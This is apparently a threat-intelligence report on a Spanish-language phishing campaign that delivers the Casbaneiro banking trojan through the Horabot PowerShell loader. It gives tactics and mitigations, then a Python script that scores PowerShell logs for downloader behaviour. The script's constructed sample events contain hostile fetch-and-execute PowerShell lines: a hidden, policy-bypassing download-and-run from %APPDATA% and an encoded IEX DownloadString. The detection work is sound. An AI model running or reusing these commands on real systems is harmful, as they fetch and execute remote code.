Full Report
A multi-pronged phishing campaign is targeting Spanish-speaking users in organizations across Latin America and Europe to deliver Windows banking trojans like Casbaneiro (aka Metamorfo) via another malware called Horabot. The activity has been attributed to a Brazilian cybercrime threat actor tracked as Augmented Marauder and Water Saci. The e-crime group was first documented by Trend Micro in
Analysis Summary
# Threat Actor: Augmented Marauder (Water Saci)
## Attribution & Identity
* **Actor Name:** Augmented Marauder
* **Aliases:** Water Saci
* **Origin:** Brazilian cybercrime threat actor.
* **Known Associations:** Linked to the distribution of established Latin American banking trojan families such as Casbaneiro.
## Activity Summary
The actor is currently engaged in a multi-pronged phishing campaign targeting Spanish-speaking users. The operation utilizes a multi-stage infection chain where a PowerShell-based downloader, identified as **Horabot**, is used as a delivery mechanism for secondary payloads, specifically the Casbaneiro banking trojan and information stealers.
## Tactics, Techniques & Procedures
* **Phishing/Social Engineering:** Deployment of lures specifically crafted in Spanish to targets in Latin America and Europe.
* **Malicious Attachments/Links:** Use of phishing emails to initiate the infection chain.
* **PowerShell Scripting:** Use of a PowerShell-based downloader (Horabot) as the first stage that retrieves and launches the secondary payload.
* **Credential Harvesting:** Exfiltration of sensitive banking credentials and personal information.
* **Multi-Stage Loading:** The banking trojan is not attached to the email itself; an intermediate loader (Horabot) fetches and executes it, so controls that only inspect the original attachment or link never see the final payload.
## Targeting
* **Sectors:** Not specified in the source excerpt beyond "organizations" in the affected regions.
* **Geography:** Latin America and Spanish-speaking parts of Europe (e.g., Spain).
* **Victims:** Spanish-speaking users; the Casbaneiro payload targets their online banking credentials and sessions.
## Tools & Infrastructure
* **Malware Families:**
* **Horabot:** Described here as a PowerShell-based downloader used as the first stage of the chain.
* **Casbaneiro (aka Metamorfo):** A sophisticated Windows-based banking trojan.
* **Infrastructure:**
* **C2 (Command & Control):** Used for exfiltrating stolen data and receiving instructions for the Horabot loader.
* **Defanged Indicators:** No IP addresses, domains or file hashes are given in the source excerpt. Take indicators only from the original vendor reporting before adding blocks or hunts; do not pivot on placeholder patterns.
## Implications
Augmented Marauder represents a persistent and evolving threat within the Brazilian e-crime ecosystem. Although the actor is Brazilian, its current lures are written in Spanish and aimed at users in LATAM and Europe, which shows an operational scope well beyond its home market. The use of Horabot as a separate loader stage means the same initial access can deliver different payloads (stealers, banking trojans) depending on the victim, increasing the risk of financial fraud and credential theft.
## Mitigations
* **Email Filtering:** Use email security controls that inspect attachments and links for script-based first stages (scripts, shortcuts and archives that unpack to them) and detonate unknown attachments in a sandbox, since the final payload is only retrieved later by the loader.
* **PowerShell Security:** Enforce Constrained Language Mode through an AppLocker or WDAC (application control) policy, which is what actually locks the language mode; a plain GPO execution-policy setting is not a security boundary. Enable Script Block Logging (Event ID 4104) and Module Logging via GPO so that downloader activity is recorded even when the script is obfuscated or passed as an encoded command.
* **User Training:** Conduct specialized security awareness training for Spanish-speaking staff, focusing on identifying localized financial phishing lures.
* **Endpoint Detection & Response (EDR):** Deploy EDR tooling to alert on PowerShell spawned from email clients or archive tools, on download-cradle and encoded-command usage, and on execution of unsigned binaries or scripts from `%AppData%` or `%Temp%`.
* **MFA Implementation:** Enforce Multi-Factor Authentication (MFA) on corporate and financial portals, preferring phishing-resistant methods, to limit what an attacker can do with stolen credentials.
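The TTP section above describes a PowerShell downloader stage, and the mitigations call for Script Block Logging plus EDR monitoring of PowerShell activity. The following is an added example, not code from the source report or from any vendor, of what a triage pass over Event ID 4104 ScriptBlockText records can look like: it decodes `-EncodedCommand` blobs (base64 of UTF-16LE text), scores weighted indicators of download-and-execute behaviour, and flags records over a threshold. The sample records, the rule weights, the threshold and the IP addresses are all constructed for this example.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) text for
downloader-stage behaviour: fetch from the network, decode, run from a
user-writable path. Example code; rules and weights are this example's own."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Weighted indicators. Weights are illustrative choices, not vendor values.
RULES = {
    "download_cradle": (3, re.compile(
        r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
        r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)),
    "encoded_command": (3, re.compile(
        r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)),
    "hidden_window": (2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "policy_bypass": (2, re.compile(r"-e(?:p|x|xe|xecutionpolicy)\s+bypass", re.I)),
    "user_writable_path": (2, re.compile(
        r"\$env:(?:appdata|localappdata|temp|tmp)\b|"
        r"%(?:appdata|localappdata|temp|tmp)%|\\AppData\\|\\Temp\\", re.I)),
    "in_memory_exec": (2, re.compile(
        r"\bIEX\b|Invoke-Expression|FromBase64String", re.I)),
}
ALERT_THRESHOLD = 5  # illustrative; tune against your own baseline


@dataclass
class Finding:
    event_id: str
    host: str
    score: int
    hits: List[str]
    decoded: Optional[str]  # decoded -EncodedCommand text, if any


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage(event: Dict[str, str]) -> Finding:
    """Score one 4104 record on the raw text plus any decoded command."""
    text = event["script"]
    decoded = None
    m = RULES["encoded_command"][1].search(text)
    if m:
        decoded = decode_encoded_command(m.group(1))
        # Drop the blob so base64 noise cannot trip the keyword rules below.
        text = text[:m.start(1)] + "<blob>" + text[m.end(1):]
    hits = []
    for name, (_, rx) in RULES.items():
        if name == "encoded_command":
            if m:
                hits.append(name)
            continue
        if rx.search(text) or (decoded and rx.search(decoded)):
            hits.append(name)  # each rule counts once, raw or decoded
    score = sum(RULES[h][0] for h in hits)
    return Finding(event["id"], event["host"], score, hits, decoded)


def alerts(events: List[Dict[str, str]]) -> List[Finding]:
    """Findings at or above the threshold, in input order."""
    return [f for f in map(triage, events) if f.score >= ALERT_THRESHOLD]


# Constructed samples (not real telemetry). The encoded blob is built here
# the same way an attacker would build it, so the decoder can be exercised.
_ENC_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/h')"
_ENC_BLOB = base64.b64encode(_ENC_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"id": "evt-1", "host": "WS-01",
     "script": "Get-ChildItem C:\\Users\\ana\\Documents | Sort-Object Length"},
    {"id": "evt-2", "host": "WS-02",
     "script": "$u='http://203.0.113.10/p.ps1';$d=$env:APPDATA+'\\upd.ps1';"
               "(New-Object Net.WebClient).DownloadFile($u,$d);"
               "powershell -w hidden -ep bypass -f $d"},
    {"id": "evt-3", "host": "WS-03",
     "script": "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENC_BLOB},
    {"id": "evt-4", "host": "WS-04",  # admin download to ProgramData: cradle alone
     "script": "Invoke-WebRequest -Uri https://updates.example.com/policy.xml "
               "-OutFile C:\\ProgramData\\policy.xml"},
]

if __name__ == "__main__":
    for f in alerts(SAMPLE_EVENTS):
        print(f"{f.host} {f.event_id} score={f.score} hits={','.join(f.hits)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

On the constructed samples, the plain directory listing scores 0, the cleartext download-to-`%APPDATA%`-and-run record scores 9, the encoded command scores 10 once its decoded body is rescanned, and the administrative download to `C:\ProgramData` scores 3 and stays under the threshold, which is the point of weighting a cradle alone below a cradle combined with a hidden window, policy bypass or user-writable path.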